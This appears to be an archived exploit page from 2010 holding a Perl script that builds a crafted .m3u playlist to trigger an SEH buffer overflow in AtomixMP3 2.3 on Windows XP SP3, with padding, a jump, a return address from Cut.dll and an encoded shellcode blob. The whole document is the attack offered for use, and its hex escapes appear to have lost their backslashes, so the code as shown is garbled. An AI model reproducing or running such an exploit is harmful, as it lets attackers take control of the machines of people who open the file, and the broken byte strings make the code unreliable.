Home / os / win7

atomixmp323-overflow.txt

Posted on 07 August 2010

#!/usr/bin/perl # AtomixMP3 2.3 (.m3u) File WinXP Sp3(fr) Buffer Overflow (seh) # Author: hadjisamir , s-dz@hotmail.fr # Download : http://download.cnet.com/AtomixMP3/3000-18502_4-10049865.html # Tested : Windows XP SP3 (fr) # DATE : 2010-08-08 ############################################################################### # --------------------tjrs fdl------------------- # samir tjrs mahboul-3lik ####(m3u file)################################################################# my $file= "xm1.m3u"; my $junk= "x41" x 728; my $junk1= "x42" x 300000; my $nsh="xEBx06x90x90"; my $eip1 = pack('V', 0x10004852);#Cut.dll my $shell = "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; open($FILE, ">$file"); print($FILE $junk.$nsh.$eip1.$shell.$junk1); close($FILE); print("exploit created successfully");

 

TOP